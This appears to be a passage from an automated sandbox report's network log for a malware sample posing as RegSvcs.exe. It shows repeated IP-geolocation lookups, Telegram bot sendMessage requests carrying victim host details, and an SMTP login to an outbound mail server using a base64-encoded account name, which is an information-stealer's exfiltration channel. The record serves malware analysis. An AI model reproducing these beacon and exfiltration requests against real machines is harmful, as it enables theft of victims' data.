    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.10 | 49832 | 104.21.96.1 | 443 | 7804 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-14 15:57:28 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
2025-01-14 15:57:28 UTC | 855 | IN | HTTP/1.1 200 OK
    Date: Tue, 14 Jan 2025 15:57:28 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 2185037
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FbiVhUL2f06mTDkltRqo%2FZTGIwZgm68NO4xEQDhlhzO2Z1HuEOmd7Uv33z0PJv9LHy3%2FfNWPHsgaLVSWkPtX2YoVN3oPL5eUhWXVE5vpM3nBHJEcnbaRdjzDgWokPJCMg%2BJqrJQ7"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 901ed26babac4363-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1685&min_rtt=1633&rtt_var=650&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1788120&cwnd=240&unsent_bytes=0&cid=63f9e49872021e53&ts=172&x=0"
2025-01-14 15:57:28 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.10 | 49843 | 104.21.96.1 | 443 | 7804 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-14 15:57:30 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
2025-01-14 15:57:30 UTC | 857 | IN | HTTP/1.1 200 OK
    Date: Tue, 14 Jan 2025 15:57:30 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 2185039
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n17aearMGIX7H0abDeFH9e9eehAxg9CJxcZvM4DHxK1xjfB1c1qqpPpHCjxgvMOZuKbB%2BnQzhzB2A2Q%2FKLJvfDSiEtPI6smbasjw1%2FIHv56d2UfFk1Y2bAz%2B0nTQX4w2Ytos5dBc"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 901ed27a1e4cde9a-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1484&min_rtt=1478&rtt_var=567&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1908496&cwnd=194&unsent_bytes=0&cid=5248ad1373fabc91&ts=178&x=0"
2025-01-14 15:57:30 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.10 | 49853 | 149.154.167.220 | 443 | 7804 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-14 15:57:31 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2014/01/2025%20/%2023:11:55%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
    Host: api.telegram.org
    Connection: Keep-Alive
2025-01-14 15:57:32 UTC | 344 | IN | HTTP/1.1 404 Not Found
    Server: nginx/1.18.0
    Date: Tue, 14 Jan 2025 15:57:32 GMT
    Content-Type: application/json
    Content-Length: 55
    Connection: close
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-14 15:57:32 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
    Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.10 | 49877 | 104.21.96.1 | 443 | 7432 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-14 15:57:35 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2025-01-14 15:57:36 UTC | 863 | IN | HTTP/1.1 200 OK
    Date: Tue, 14 Jan 2025 15:57:36 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 2185045
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LsWm3qPninmlYgu1272%2BYdf1a6IXbZ7II1qCBu0gteruQcu%2FgS8kBNIguqdzrVx5k5xdpDNv%2FOc%2FdJn%2FwvJeeHO%2BBG1fUckmhphi9%2Fm4OHTWMYFRjygvKEqsHPDmnNpxKGxD6he6"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 901ed29c195072a4-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1964&min_rtt=1962&rtt_var=741&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1471774&cwnd=212&unsent_bytes=0&cid=171e287f383ecfcf&ts=215&x=0"
2025-01-14 15:57:36 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  11192.168.2.1049886104.21.96.14437432C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2025-01-14 15:57:36 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                  Host: reallyfreegeoip.org
2025-01-14 15:57:36 UTC | 861 | IN | HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 15:57:36 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 2185045
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f5aiaDPC54JM%2FrYpGs4p87nXdPL4VmVpt%2Bsi6Fx%2FE2VXRj1M2xFnQhccRk7fZDQsQDYGDzzX5P%2BU1cnGzYcnwudFX6%2B8YnS7u77eFMzWoXYGK6AxYeS5lknsHuFSNNR%2FqiXZ8coE"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 901ed2a1480b72a4-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1964&min_rtt=1952&rtt_var=757&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1420924&cwnd=212&unsent_bytes=0&cid=5b4cbec2f6e74522&ts=142&x=0"
2025-01-14 15:57:36 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.10 | 49895 | 104.21.96.1 | 443 | 7432 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-14 15:57:38 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-14 15:57:38 UTC | 855 | IN | HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 15:57:38 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 2185047
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kx3TAWW4gWn2CpmEUOHS3aw8g2liSGFwMkSoCX%2F1htqLS9EPXop3OBYeJdmo5V6yli7RM%2BctF4DK9G0mmzwJ7aegR4uENc4iNL0umGhVLGlsfAAgrYVhpB%2FCclO1vEeAu7tvgleN"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 901ed2a98952de9a-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1447&min_rtt=1433&rtt_var=566&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1885087&cwnd=194&unsent_bytes=0&cid=f2ce730d255ddf49&ts=154&x=0"
2025-01-14 15:57:38 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.10 | 49905 | 104.21.96.1 | 443 | 7432 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-14 15:57:39 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-14 15:57:39 UTC | 865 | IN | HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 15:57:39 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 2185048
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hmG5ji%2BDWag4GBygKnqGIQ96Tdku%2Bd9VF6jcDAQsPKYgScW%2FrzzHJ%2BlLzlLvHujtCLgjC6nKGZVrF7xrWuVHZr8vfP7DIY6Z2DNGPPsVeZD%2BjF%2FSO0%2FD15Qmlx7ftZa7B2W%2FbCcb"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 901ed2b22900de9a-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1509&min_rtt=1485&rtt_var=606&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1736028&cwnd=194&unsent_bytes=0&cid=7354cae936482045&ts=156&x=0"
2025-01-14 15:57:39 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.10 | 49914 | 104.21.96.1 | 443 | 7432 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-14 15:57:40 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-14 15:57:40 UTC | 855 | IN | HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 15:57:40 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 2185050
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7ZHAHdP8ssC8Ss%2BVD567R7iWsYMUhey8D3bHKijcNsa1ciqZ%2BSX8JGLjpMaXshIWgeecGXhctLZYUZ2MXHWAOKs0fqwF2DW1mvdtBLC4HiQrD9h3Aoe87S9TgAPZ8m8hLeT%2FDTVd"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 901ed2badcf672a4-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2038&min_rtt=2033&rtt_var=773&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1406551&cwnd=212&unsent_bytes=0&cid=d44c06dd9b33ac0f&ts=145&x=0"
2025-01-14 15:57:40 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.10 | 49927 | 104.21.96.1 | 443 | 7432 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-14 15:57:42 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-14 15:57:42 UTC | 859 | IN | HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 15:57:42 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 2185051
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hd%2BqIxybZwTMLNx67F39QI7q6GCmKYzBGHc1xuv9Qsz1lqLdq%2BpqUVoxz4DkuJg4ENqzhdSEQbBriM%2BqDpl9EpcF58h6%2B7FYY0oY91BGSeViPYO2imQ8t4EPpp36mJ6R8oP4k%2Bve"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 901ed2c2fa511a48-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1969&min_rtt=1960&rtt_var=753&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1435594&cwnd=157&unsent_bytes=0&cid=cfa872f39df32332&ts=139&x=0"
2025-01-14 15:57:42 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.10 | 49937 | 104.21.96.1 | 443 | 7432 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-14 15:57:43 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-14 15:57:43 UTC | 857 | IN | HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 15:57:43 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 2185052
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qHFl85p7cdxBWtAYBEatoSxMM8T8QPXKmOi99R91P%2FW%2Bi7o5qaDKrZgU5xx1RQxL3eMx8qERiP494VLpF8MI%2F%2FGQ7HMmxD6Mxz0ikz69XVC3eOLKucCz34UmHqKXuU3zKWlGFJdU"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 901ed2cb3f4542c0-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1626&min_rtt=1620&rtt_var=621&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1744324&cwnd=212&unsent_bytes=0&cid=fae4185d2b0aa594&ts=173&x=0"
2025-01-14 15:57:43 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.10 | 49946 | 104.21.96.1 | 443 | 7432 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-14 15:57:44 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-14 15:57:44 UTC | 856 | IN | HTTP/1.1 200 OK
Date: Tue, 14 Jan 2025 15:57:44 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 2185053
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AVwpAcrtj8SEAP4HOU8Of4x0eA2wRuqodkl%2FedqVRmrd88I2R200HBYoWE%2FWgPFjE%2B1xw2nODhvnfRDmpIqiCVGP8IrJ8jZq8y7VbF7BZlkllLbBuRu3QTOcSjvOAcFTh97Wqj7V"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 901ed2d3584ade9a-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2247&min_rtt=1771&rtt_var=1004&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1648785&cwnd=194&unsent_bytes=0&cid=c51cd220bff25a6e&ts=150&x=0"
2025-01-14 15:57:44 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.10 | 49958 | 104.21.96.1 | 443 | 7432 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-14 15:57:46 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
  Host: reallyfreegeoip.org
2025-01-14 15:57:46 UTC | 853 | IN | HTTP/1.1 200 OK
  Date: Tue, 14 Jan 2025 15:57:46 GMT
  Content-Type: text/xml
  Content-Length: 362
  Connection: close
  Age: 2185055
  Cache-Control: max-age=31536000
  cf-cache-status: HIT
  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AWRE2KQisQ4UsOfet0pZf3hSg100EACrKiWW4B0wEJN6wlv36tWWbvHpmF73rZmv%2BJRkjF18neQm3nbRipGsneR7IFYMOMnrRmXKuYjlWGF2%2BcAFwFNn7CwsRq4VXe1VaJo51xSf"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 901ed2db9aa372a4-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=2056&min_rtt=2041&rtt_var=776&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1430671&cwnd=212&unsent_bytes=0&cid=61c4fa456a0488ff&ts=146&x=0"
2025-01-14 15:57:46 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.10 | 49962 | 149.154.167.220 | 443 | 7432 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-14 15:57:46 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2014/01/2025%20/%2023:22:15%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
  Host: api.telegram.org
  Connection: Keep-Alive
2025-01-14 15:57:47 UTC | 344 | IN | HTTP/1.1 404 Not Found
  Server: nginx/1.18.0
  Date: Tue, 14 Jan 2025 15:57:47 GMT
  Content-Type: application/json
  Content-Length: 55
  Connection: close
  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
  Access-Control-Allow-Origin: *
  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-14 15:57:47 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
  Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Jan 14, 2025 16:57:41.558362961 CET | 587 | 49918 | 208.91.199.225 | 192.168.2.10 | 220 us2.outbound.mailhostbox.com ESMTP Postfix
Jan 14, 2025 16:57:41.558599949 CET | 49918 | 587 | 192.168.2.10 | 208.91.199.225 | EHLO 305090
Jan 14, 2025 16:57:41.705163002 CET | 587 | 49918 | 208.91.199.225 | 192.168.2.10 | 250-us2.outbound.mailhostbox.com
  250-PIPELINING
  250-SIZE 41648128
  250-VRFY
  250-ETRN
  250-STARTTLS
  250-AUTH PLAIN LOGIN
  250-AUTH=PLAIN LOGIN
  250-ENHANCEDSTATUSCODES
  250-8BITMIME
  250-DSN
  250 CHUNKING
Jan 14, 2025 16:57:41.706146955 CET | 49918 | 587 | 192.168.2.10 | 208.91.199.225 | AUTH login ZGlyZWN0b3JAaWdha3Vpbi5jb20=
Jan 14, 2025 16:57:41.854944944 CET | 587 | 49918 | 208.91.199.225 | 192.168.2.10 | 334 UGFzc3dvcmQ6
Jan 14, 2025 16:57:42.009579897 CET | 587 | 49918 | 208.91.199.225 | 192.168.2.10 | 235 2.7.0 Authentication successful
